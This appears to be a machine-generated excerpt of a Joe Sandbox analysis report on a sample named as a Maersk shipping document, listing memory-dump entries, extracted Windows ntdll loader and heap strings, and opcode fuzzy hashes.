                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    APIs
                                                      • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    • API String ID: 1404860816-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    Strings
                                                    • LdrpInitializeProcess, xrefs: 017D8422
                                                    • @, xrefs: 017D8591
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    Strings
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                    • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                    • .Local, xrefs: 017D28D8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    Strings
                                                    • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                    • API String ID: 0-1245972979
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    Strings
                                                    • apphelp.dll, xrefs: 017C2462
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                    • LdrpDynamicShimModule, xrefs: 0180A998
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    Strings
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                    • HEAP[%wZ]: , xrefs: 017B3255
                                                    • HEAP: , xrefs: 017B3264
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    • API String ID: 0-617086771
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $@
                                                    • API String ID: 0-1077428164
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    Strings
                                                    • LdrpCheckModule, xrefs: 0180A117
                                                    • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-161242083
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    Strings
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                    • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    Strings
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                    • @, xrefs: 0185C1F1
                                                    • PreferredUILanguages, xrefs: 0185C212
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    Strings
                                                    • LdrpCheckRedirection, xrefs: 0182488F
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    Strings
                                                    • LdrpInitializationFailure, xrefs: 018220FA
                                                    • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    Strings
                                                    • LdrResSearchResource Exit, xrefs: 017AAA25
                                                    • LdrResSearchResource Enter, xrefs: 017AAA13
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    Strings
                                                    • kLsE, xrefs: 017A0540
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • API String ID: 0-1106856819
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .mui
                                                    • API String ID: 0-1199573805
                                                    Similarity
                                                    • API ID:
                                                    • String ID: EXT-
                                                    • API String ID: 0-1948896318
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    Strings
                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                    • API String ID: 0-702105204
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                    • Instruction ID: a1cf12155d7e8569cd598223c8fdac86ed74613f2534952e7b0c11ba04466c19
                                                    • Opcode Fuzzy Hash: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                    • Instruction Fuzzy Hash: F271D232600701BFE7229F1CC888F56BBE6EF84724F284418E655C72A1E775EB44CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                    • Instruction ID: 22b55775cde257da6f576b8b14a9eac4bb85cb5675a94695855dde7c1bb2a4be
                                                    • Opcode Fuzzy Hash: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                    • Instruction Fuzzy Hash: 4C81B472A0431A8FDB25CF9CD988B6DF7B2BB88315F59422DD900AB295C7749E41CF90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11f3ca4532a018c796fed5b8f76e7060ce5ae096d68b7ef7b9f51648198e903d
                                                    • Instruction ID: d9bb027364b709c0cbef45a0c577e0e2e1f7c053bb6bb2427f9e811f92db1430
                                                    • Opcode Fuzzy Hash: 11f3ca4532a018c796fed5b8f76e7060ce5ae096d68b7ef7b9f51648198e903d
                                                    • Instruction Fuzzy Hash: 8A710B71E00209AFDF16DF94C889FEEBBB9FB09354F104119E624E6290E774EA45CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                    • Instruction ID: 4f16ea754ab112880a6252b4fd1f3957aabe4082dbad0cc9c0fd0de2bf310e7d
                                                    • Opcode Fuzzy Hash: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                    • Instruction Fuzzy Hash: 4151B172504612AFD755DEA8C8C8E5BBBE8EFC8754F010A29BE40DB150D770EE05C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                    • Instruction ID: c7f2bb6004c0fa61e24827a0cbb34e8ab9be143c1776677e6f4eb98df38a10a5
                                                    • Opcode Fuzzy Hash: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                    • Instruction Fuzzy Hash: 4051E27090070DDFD721DF9AC884A6BFBF8BF55714F10461ED292976A1CBB0A645CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                    • Instruction ID: 4bb9fb800ad0ef84b05d5c21ed16c16b618a639b9b44c417d2f299d3d22c94f3
                                                    • Opcode Fuzzy Hash: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                    • Instruction Fuzzy Hash: 07516B71600A09DFCB22EFA9C984EAAF3FDFB14784F400869E55297264DB34E940CB50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                    • Instruction ID: 76aa8ba87efe7531d5cc89f928e4a294508dbeb3301e419670cca9d5e68085d6
                                                    • Opcode Fuzzy Hash: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                    • Instruction Fuzzy Hash: 5E517A7160834A9FD754DF29C881A6BBBE5BFC8708F44492DF599C7250EB30DA05CB52
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction ID: fe139c4e59eaa5f2d8ca23fd7855df1a8d449c637979eda8831b5fc7242be587
                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction Fuzzy Hash: C1519E75E0020AABDF16DF98C854BEEFBB5AF44B50F04406DEA12AB240D734DA44CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                    • Instruction ID: cdfe20228c017acb2551508324bb287b8f5d829c93d57fbcba95900efedb2eab
                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                    • Instruction Fuzzy Hash: 6A51D931D0022EEFDF22DB94C894BAEBBB8AF04314F154655D612F7190D7709F808BA5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                    • Instruction ID: ca50577f0b1e7ac633de54c38ebf3f43ec25d237ce48f8204c11b8177bccc015
                                                    • Opcode Fuzzy Hash: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                    • Instruction Fuzzy Hash: 1F41E3B07017019BD729DB2DC894B7BBB9EEF92320F188219E95DCB284DB30DA01C791
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                    • Instruction ID: 6b6d29995038a7cb29f34cfc2778c516614fcd3e171e15f31d4af96b10bb0a71
                                                    • Opcode Fuzzy Hash: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                    • Instruction Fuzzy Hash: DE518F7190022ADFCB22DFA9C984AAEBBB9FF48354B644519D545E7305E730AE81CFD0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                    • Instruction ID: 519b3bc8ef7cb41f8522ee9945da4167bba61f5ea48491570d4b714792967c60
                                                    • Opcode Fuzzy Hash: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                    • Instruction Fuzzy Hash: 28412B72B002069BCB25EFA898C5F7AB774FB58718F5504ACED16DB249E7B1DA00CB50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                    • Instruction ID: c7f9569d8638651d9db483a5d2dcc9948999d35e4988f4a433d3a52826d7774f
                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                    • Instruction Fuzzy Hash: DD41E5316017169FD729CF28C984A6EB7ADFF80315B05466EE912DB644EB31EE04C7D0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                    • Instruction ID: 3d913a2a7b2eb1399d72481caedbb91731d86efdc2b804843a16ac212867df9d
                                                    • Opcode Fuzzy Hash: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                    • Instruction Fuzzy Hash: 25419B76D012199BDB14DF98C440AEEFBB4BF48710F14926EF915E7240DB35AD41CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                    • Instruction ID: 50bc324ccacbb44569295e87da78ba602d169cadb4b8f689506b1e30240dca51
                                                    • Opcode Fuzzy Hash: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                    • Instruction Fuzzy Hash: 6141C0712003069FD721DF28C884A6BFBE9FF88324F14486DEA57C7656EB35E9448B50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                    • Instruction ID: 6a0918a545b93b2b91861b06e5649af6fc9f3de040e2ddff4f116945d82fd594
                                                    • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                    • Instruction Fuzzy Hash: E9516C76A01255CFCB19CF98C580AADF7BAFF84710F2481A9D915E7355D730AE81CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                    • Instruction ID: 8d26c4c6182ed33e8867b7a5f622ad4ff196471e093bf7ab24cf892793a15abb
                                                    • Opcode Fuzzy Hash: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                    • Instruction Fuzzy Hash: 7451187090420ADBDB269B28CC48BE8FBB1EF55314F1843A5E515E72D5E7346A81CF40
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                    • Instruction ID: 2b9b2def0494248292c0768a20a53133328eaf43963ee9d1fcc4d0bf0cac641b
